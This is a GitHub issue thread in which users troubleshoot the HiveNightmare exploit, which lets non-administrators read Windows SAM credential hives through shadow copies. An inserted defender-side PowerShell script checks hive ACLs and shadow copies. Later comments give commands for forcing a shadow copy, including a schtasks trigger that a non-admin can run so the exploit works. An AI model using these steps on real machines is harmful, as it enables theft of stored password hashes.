Getting error "Could not open SAM" on Windows 10.0.19043.1055
Closed this issue · 3 comments
To start, I know this 'exploit' (for lack of a better term) is very new and still being explored. I'm not expecting anyone to solve my issues, but wanted to get information out there in case others are running into the same issue and if any of us (myself included) can solve it, it may help others.
When running this I'm getting an error that it could not open the SAM:
```
C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>.\HiveNightmare.exe
Could not open SAM :( Is System Protection not enabled or vulnerability fixed? Note currently hardcoded to look for first 4 VSS snapshots only - list snapshots with vssadmin list shadows

C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>
```
Currently running Windows [Version 10.0.19043.1055] and can see that the user permissions include read for the SAM database. This is a domain-joined computer in my lab with no other changes made. The image is the latest VM for developers.
```
C:\Windows\system32>icacls c:\Windows\system32\config\SAM
c:\Windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Windows\system32>
```
I did try the command suggested in the error and it looks like it can't find any shadow copies.
```
C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

No items found that satisfy the query.

C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>
```
On my non-domain joined hosts it does not show that the users can read the SAM database, so I'm not sure if this requires domain joining or if it's just me.
If I find a solution, I'll update this. If anyone else has any thoughts/ideas I would welcome them.
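The two checks the poster ran by hand above (the `icacls` ACL on the hive file and `vssadmin list shadows`) can be combined into one defender-side assessment. The following PowerShell script is an added example; it is not code from this issue thread or from the HiveNightmare project. The function names `Get-HiveExposure` and `Get-ShadowCopySummary` are my own, the SIDs are the well-known ones for Everyone, Authenticated Users, BUILTIN\Users and the two APPLICATION PACKAGE AUTHORITY groups, and it assumes it is run from an elevated PowerShell prompt on the host being assessed.

```powershell
# Added example, not part of this issue thread or the HiveNightmare project.
# Reports the two conditions discussed in the issue:
#   1. Do broad, non-administrator principals hold read access on the registry
#      hive files under %SystemRoot%\System32\config? (The icacls output above
#      shows BUILTIN\Users:(I)(RX) on SAM, which is the exposed state.)
#   2. Do any VSS shadow copies exist that would carry a readable copy of those
#      hives? (vssadmin reported none on the poster's VM.)
# Run from an elevated prompt; Get-Acl needs READ_CONTROL on the hive files.

function Get-HiveExposure {
    param(
        [string[]]$HiveNames = @('SAM', 'SECURITY', 'SYSTEM')
    )

    # Well-known SIDs that should never be able to read these hives:
    # Everyone, Authenticated Users, BUILTIN\Users,
    # ALL APPLICATION PACKAGES, ALL RESTRICTED APPLICATION PACKAGES.
    $broadSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-15-2-1', 'S-1-15-2-2')
    $readMask  = [System.Security.AccessControl.FileSystemRights]::ReadData

    foreach ($name in $HiveNames) {
        $path = Join-Path $env:SystemRoot "System32\config\$name"
        # Get-Acl reads the security descriptor, which works even though the
        # live hive file is held open exclusively by the kernel.
        $acl = Get-Acl -LiteralPath $path
        # Ask for rules keyed by SID so name translation differences between
        # domain-joined and workgroup machines do not matter.
        $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

        $exposing = $rules | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (($_.FileSystemRights -band $readMask) -ne 0) -and
            ($broadSids -contains $_.IdentityReference.Value)
        }

        [pscustomobject]@{
            Hive      = $path
            Exposed   = [bool]$exposing
            ExposedTo = ($exposing | ForEach-Object { $_.IdentityReference.Value }) -join ', '
            # An inherited ACE means the parent config directory ACL is what needs fixing.
            Inherited = [bool]($exposing | Where-Object IsInherited)
        }
    }
}

function Get-ShadowCopySummary {
    # Win32_ShadowCopy enumerates the same snapshots as "vssadmin list shadows".
    $copies = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)
    [pscustomobject]@{
        Count   = $copies.Count
        Volumes = ($copies | ForEach-Object { $_.VolumeName } | Sort-Object -Unique) -join ', '
        Oldest  = if ($copies.Count -gt 0) { ($copies | Sort-Object InstallDate | Select-Object -First 1).InstallDate } else { $null }
    }
}

$hives   = Get-HiveExposure
$shadows = Get-ShadowCopySummary

$hives   | Format-Table -AutoSize
$shadows | Format-List

# A standard user can only recover the hives when BOTH conditions hold:
# a broad read ACE on the hive files and at least one shadow copy to read them from.
if (($hives | Where-Object Exposed) -and $shadows.Count -gt 0) {
    Write-Warning "Hive files readable by non-admins AND $($shadows.Count) shadow copy(ies) present: exposed."
} elseif ($hives | Where-Object Exposed) {
    Write-Warning "Hive ACL is too permissive; any future shadow copy would expose the hives."
} else {
    Write-Output "Hive ACLs restrict read access to administrators and SYSTEM."
}
```

The script only reports; it changes nothing. On the poster's VM it would flag the permissive ACL but zero shadow copies, which matches the tool's "Could not open SAM" message. The `Inherited` column is worth watching: when the offending ACE is inherited, the fix belongs on the `System32\config` directory rather than on the individual hive files, and any shadow copies taken while the ACL was permissive still carry readable copies until they are removed.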
I was able to resolve this by manually kicking off a shadow copy as the admin user (for proof-of-concept purposes) using this command:

```
wmic shadowcopy call create Volume=c:\
```
I saw only afterwards that you can trigger that from a non-admin user using:

```
schtasks.exe /run /TN "\Microsoft\Windows\FileHistory\File History (maintenance mode)"
```
I believe this won't be an issue in most scenarios as there seems to be a shadow copy on most machines. I have not verified it, but I believe it may depend on your disk size and since my VM is rather small, it probably didn't trigger it.
Cheers! Yeah, for example on my gaming PC there was a snapshot from monthly patching, and one from installing 7-Zip. So in the real world you should have some snapshots from usage.

Btw, I updated the code to look for the first 4 snapshots instead, so an early snapshot should work now.